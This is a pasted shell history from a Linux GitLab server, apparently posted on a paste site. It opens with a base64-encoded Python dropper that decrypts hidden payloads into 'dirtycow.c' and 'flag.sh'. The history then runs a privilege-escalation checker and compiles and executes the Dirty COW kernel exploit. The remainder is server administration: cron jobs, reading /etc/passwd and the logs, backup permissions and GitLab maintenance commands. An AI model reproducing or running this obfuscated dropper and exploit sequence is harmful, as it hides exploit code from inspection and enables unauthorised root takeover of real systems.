1nWGJMcU02SUxrZk51VzFDNXNZUE96NVdQTUVGWFJ6bFAwNG9DUm9wZW9MRHhxZGxpK25NaVl5R3oxenpVcnlpR2N0bVVWeUgwbE5PdENxLy9KQWM1RWpMaUJtR2djKzBqeWpkMFhWcjlXbWJxbHRxMjNXMCtSYkJXTXJ0VTJiTStIenBpUkNGNnFJdTVLdTJXSmxBNzBYa20yTzE2b0l1MXg5NWNqRmtXQkpnOUZ4ajdkMjZiVVkyWG4vblMxNGYrR0phZDFSQlBvU3JYTnlTY1h6WmdFREJBZnJkaU5ZaHU5VGYvS05YYnNBMWc2ZWFQWE9MWk1UNklGcEsxSHIyWkFULzUvZUd1SWxsQlo4aG82bjlTenVPSkxucWVwZzJCUFRyMHV1Nks0WkVQcVFzZ0V4MGJVQUs1MlFLQzZQVisyT3BQdTh1S21lOU5tYXNndWRBZjB2VlExSjVicGR3NEtiL0R6bUp4OEJoY0J2emVSRHFnZlhHK0Z5Smk3aDQvdGVPeGJUTFJVYlRjZjE1QXRHNmMvZytod0FoVC9udTgvRUx1OVp5NStGNHVyV0dWNjRtRld6bmllaytYdTdTdXluSzN1bkNmK2hHbTdXeW5DV0NuaEhUK1h4UEx3Tnp1QVkyaS9WdXlyUTR0SUIxbnFTSi9wbmNlUlgyZFNuV1RscjRuL0hyNTNOYlNBQlN3ZHpyWkJKaVBDUzY5VzBXRjh5WTdlZTBXd2M1c3ZsZmMzeDhaemFsaHpibGF2OVREZVExMWdvUFQwWkdzU1RRcDRlNFQzckVmZk1VMFFVYU9NNEFZTFZtT296aFluTVFJTDRsWWdNNVhmUXRqcjNibVJ4RCtlak5Fbi8yTzc4dTNpNWVZYTB3cDZacmhNUlNlbmR3NU4wNmVET0VQWGFxaGwxSkQvQ2FRbW9PZlVTRVp6enlPbnpxY3lkZWVCeDMrQS96d01hbTNrOU1hMTViRXBBLzhMNnBkaG9XalBrRjEvNXVxRmE2OTdtSHcrTzdVbUN0Ti82TksxWDA1QWtBSWxLUVJSZGtVNUxrMHlZckl2ZEdtU2p1V2FHa2o0VERkWEE3dWJhbDJ1RTUzNDAySjVWczM4Zys4N1pGYSs0OUltTWRldXR2Yjl6TkFhNG40enRycUJ0OE1taGZ3RG42NTJZblZPeDJWVDFOK0dPN3NCYTlzS2pVb1M0UDU4Q05JZUw5RGRpbGFjTkNMdDlLMTR3V1RsWDFkTkVJSXVGZHpJY09MdE5SWmRpLzFYelhwaE5vdUxKSTB5ZVoxL1FtdFRtUks2bzA2cnVObEZyZzNzWWhYcldFNVhXNW0zV0ZaTjI1SmF0Vk1EcCtSTFFMUy9SeWNodStVYVc0dnZDNXZNRXNOWGV1WkY4WU1sV0NRcEZRU2ZrVVA2cUhpcjF4a2hrU0JWa2tNUHhiT3FSNEFzamdxNzhTWVJTeG9jVmJ6cEFMbHBGYXZjQnY4MDdhMHYrQVFKeUFLS3RwSHQwZTVmU1B2b2RGMkQ2VVkybTRvY054azk2WjJDUmRFbG9lWFU3cGpKUVRxWHFadTVsa1RYQzQ1T3Z3aGVQVkxIZE5YYTB4TjhENW9qYTN1dy8waXU5eXBMaFJXWGVlZjc5SEVBWjFReGowSVJpVGNjN0FFMytRVDdZVzdmNWQvcjVmS08rOVJXNlM4cEY5TTRKVkx5MEllN1V4YXluNFJsVVA2QlJoeUx5RUJuNDJzOTUwa2NlRjVCQXFQQjgvUkxjWVB5VVh4bi9USkYvRFBuTUcyMFJUYWxuUU8ydENhcUd0Z2lMeHdYOWRxU2oxcWpwT1lUUHBNZW04NFp2U2Nhdm02UzFTeFl3bCtJRXdPMmZUaW5ZUlFyazc1T0NGSStiMGJNd2xiakxFZFRQbXNySThLakZobTNnR0UzVmhLV1pkbjJXZU5CTEgrOS9JQWFENVBkRHVaZEgrUkJwQk0zbFVLZHJMU0VNZTYyMHp1UW8vTVB6MGkwelZqN2hJK0lXM1U3YUwyaWs0YzBacENsZnFIVjJ5Rko0cTlad1ZVcHJ5WGkvemNTKyt3NkprZ29qWFhwUm41OFFod1h5cmtMMGNMYk5leTd2ek14ZHM5eExJQUZKVHVlTXhISWRaNmhTbExaeEFNSis3ckdVQlZTbUpqb0ZJREZyV05FRUtzWjVpSmVocFFKQjJwSGtxdzN4Wjh4Z0c3cHp3ZlZSY2hwMFhTZUg3N2kxRHNYVTBUTURMUFJjbWFhUUthTm0vdXVaLzh1VkZzM1pYZjAxY3k5endieTBvK3R4VkdRUWJQc1FKUUhGc2VjU3BQNm1iQ0NmTXhmMnkwOEd6NlhNWENVWlpoVlRQcnU4THZqRFU2SDRzNW5aWjZRNUowYkMrM1A2LzdMYlY3WFF2Y0NNajdrYnlocktJNXd0d3BuM2JDbElhRXdJVVlwY0Z3bTF4VVAyaU43Z0x3ejd0dFhQRFpTVnBQekZ5bk1DS3Z2MkdoSTBBTDRsQkg3NEZFQTd4VlRLbVBISGJBcmczUHVKL3N3RXlGZHpRdkYyNjFJZFg3YmhVQ25LeEJHeWlNRkFqc3o5d1M4NTBWVlBrM2VxcXowK09EMEhwVUtwYm1kdkVBTVdJMVFDZjEyRTN6NHdrZFR6RFpRQXFZbm4yR0pOaDAybXVtSmZUMHlSbW0xZ0I3TnpBbDlHMVRKNWpVVmtmZENEWGoxbWtmMHlrdENQV2NwT3l0Z2NnbENaZCtTS2cxQ000a05GWG5yamRweUNwMll2ZnUrU1R5dzlueFkxelh6ejZhem44dWtVT1luSzFJRGNPdWZ0ZTlaQVZPYTR5SnZJbklaRmhhVlUrR2Jobm9FbCtYOENBeXp0Yi9aUTg3NjVVRzBCNy9tV0NnWEVjV1RMYVl6QSt0WFV0V1Q2M3ZqUVdKc013UElXS2NrT0piY0oxT2dNaU5rRGd5T0p3YmdEbzAvQndWVFBGbGdzaTlaRjRTcnZXTGY5dFhSSGpMUmZjY2xVWlp4L2dhd1BNUDl5d3piQVdDQkppL1haSXY4eFYzK1NvNVZ5b014Q2xsR1hlWGx5OUFYZ3FXSklVdFNLSi8wWWtja3pMcTBodU1DUHVDQ2NkY2o3R00vRGk3YnJtWVc2NnkrOVlqdW8yTjdBQVdmam1SY3F0ZmVLVnVPeDhyd2JkM2NNbzNmc2lnS3hSZ0lNWEUvTjNuQ1hXSXI1clFDUitNaDBGekZOOXlIWDg5bWpuWnlLVWhXQkEwSlZIay9DcUkrSnhFMkNIZk5ob2FJOWE0c1BkdTJmNHdLWDh3UXZydENpOFNhRE9YRk9yMjg3Skc3ODg0R1FSaWk0M0RkN3FDbDlYYW5jbVBuVnAwT3NRWGJJb3phL2F3TUxsZ0F4c1JYL0paeDBHQjNCM1RQRXFyWlRGR0NtSW81L3VIekQzRWVoekpqWllRUnFZenQrL1dnNmtyVjNWcTNQT0J4OFZ3UkVLaHZENjdIUUlMbDRjU2VVdlZTODBNa09hYUVhN0hMQ1doN3dYUUoyeGFtVUdVS2VQenVFQldFVUdUbTlRdUord1ZNK0NuT044Z1l0V1FUSUl1azZ1WkhHcjdONGdobGlRNEJRVGpyMkwvMXM1QVM5MmRYT3FXVHljOXVjR2MydFVBR3VaSldNWnJJT0ZWclhzVnBkSk16VUl2dGVGd1NSZUhFcGp0Zlk3eGRyczdJYlZSc0JRUnBsZnNzYTFxUDBuL2xSVT0nCgkJCXNhbHQgPSAnZHc2YVptSi9tWnRCVTRzdmppUHZ1QT09JwoJCQlub25jZSA9ICdQSStFVjd4a1RlRDZWR1YwR2lFMzlBPT0nCgkJCXRhZyA9ICdTNHArcnZucy9DQUJBKzJVaWIwRlNnPT0nCgkJCWRlY3J5cHRlZCA9IGRlY3J5cHQoY2lwaGVyX3RleHQsIG5vbmNlLCB0YWcsIHNhbHQsIHBhc3N3b3JkKQoJCQlvdXRmaWxlID0gb3BlbigiZGlydHljb3cuYyIsICJ3IikKCQkJb3V0ZmlsZS53cml0ZShkZWNyeXB0ZWQpCgkJCW91dGZpbGUuY2xvc2UoKQoJCQlwcmludCgiRGVjcnlwdGVkIikKCQllbGlmIGNob2ljZSA9PSAzOgoJCQljaXBoZXJfdGV4dCA9ICdEVzlQZis2TTBiYUY2YTVsZzVvK0Jsb2ZOeFFpcTNQZFVZVjgzNWFuRlJnUWFib0thTzRHRThkKzV3dVU1Y2VNbVlFVFJGK0toSzJLa29CakQzY3crMnFYQjQyd3BuK2VKWXB0NGt4amtIN2poTit5RTFNTVJ4RHNYTnk5ZUt5SzZ5WnMxdTUvNEFPTWxkY3liK3FhMmxJdlpScFpXYTF2anYwTENXS2Nycmg1eWdlUTNaTWlQd1V6dmlSWFNKaVZxQjFpNVFGeU5hdlBNY2hjTjNGK2NzM2NUUHRsdWNxZUtkWjgyeWNyWkVWUWh1dXBtVGlhcGN0eEtQcGVuZWNwZGJ1ejZGOFhmZk9SdzNxWScKCQkJc2FsdCA9ICcwYkFQVGpFOS91WnlrRkk0Z2g3Wmx3PT0nCgkJCW5vbmNlID0gJ2lsd281RmtKakNxTzRYZnZhTWQzS3c9PScKCQkJdGFnID0gJ0szVFVySmZyLzJOOVEvNVQrSDdpNkE9PScKCQkJZGVjcnlwdGVkID0gZGVjcnlwdChjaXBoZXJfdGV4dCwgbm9uY2UsIHRhZywgc2FsdCwgcGFzc3dvcmQpCgkJCW91dGZpbGUgPSBvcGVuKCJmbGFnLnNoIiwgInciKQoJCQlvdXRmaWxlLndyaXRlKGRlY3J5cHRlZCkKCQkJb3V0ZmlsZS5jbG9zZSgpCgkJCXByaW50KCJEZWNyeXB0ZWQiKQoJCWVsc2U6CgkJCXByaW50KCJXcm9uZyBjaG9pY2UiKQoJZWxzZToKCQlwcmludCgiV3JvbmciKQoKCm1haW4oKQ==" | base64 -d > dropper.py
python3 dropper.py 1
chmod +x unixprivchecker.sh
./unixprivchecker.sh
python3 dropper.py 2
gcc dirtycow.c -o dirtycow -pthread
./dirtycow
ls -la
chmod 750 /backups
usermod -a -G git gitback
cd backups/
ls
echo %u
cd /etc/ssh/
ls
ls -la
cd
ls
cd /home
ls
cat /etc/passwd
cd /backups/
ls
ls -lah
crontab -e
date
service cron restart
exit
crontab -e
grep CRON /var/log/syslog
grep CRON /var/log/syslog.1
cd /var/log/
ls
ls -latr
gzip -h
gzip -d syslog.2.gz
ls -la
grep CRON /var/log/syslog.2
gzip -d syslog.3.gz
grep CRON /var/log/syslog.3
journalctl -u cron.service
crontab -e
journalctl -u cron.service
grep CRON /var/log/syslog
ls -la /backups/
less auth.log
crintab -l
crontab -l
gitlab-rake gitlab:env:info .
gitlab-rake gitlab:env:info
apt-cache madison gitlab-ee
apt-cache madison gitlab-ce
cat /etc/apt/sources.list
cd /etc/apt/
ls -la
cd sources.list.d/
ls
cat gitlab_gitlab-ce.list
cd
ls
cd /tmp/
ls
crontab -l
su git
ls
cat res.txt
ls
cd /root/
ls
ls /backups/
ls
ls -la
cd /backups/
ls- la
ls -la
cat /etc/passwd
ls -la
crontab -e
ls -lah
cd..
df -h
rm 160*
ls -la
cd ..
ls- la
ls -la
su gitback
ls -la
cd backups/
ls -la
cd ..
ls -la
chmod 740 backups/
ls -la
chmod 750 backups/
ls -la
chmod 760 backups/
ls -la
usermod -a -G git gitback
cat /etc/group
ls
ls -la /
chmod 770 backups/
cd backups/
ls -la
su gitback
gitlab-rake gitlab:storage:migrate_to_hashed
cd


Created: 11/12/2020 12:10:56
Page views: 208
CREATE NEW PAGE